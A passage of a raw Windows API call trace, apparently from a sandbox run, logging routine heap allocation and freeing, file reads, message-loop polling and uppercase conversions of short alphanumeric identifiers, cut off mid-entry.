[0087.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.837] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.844] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.847] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0087.847] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x8f23, lpOverlapped=0x0) returned 1 [0087.849] ReadFile (in: hFile=0x294, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0087.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0087.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0087.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x39c8020 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.852] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.852] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.853] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8f23) returned 0x2a7a130 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0087.853] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0087.853] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0087.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8f23) returned 0x2a8bf90 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.854] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.854] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.855] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.855] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0087.855] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0087.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0087.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0087.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.855] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0087.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0087.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.859] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.859] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0087.859] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0087.859] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0087.860] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0087.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0087.860] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0087.860] HeapFree 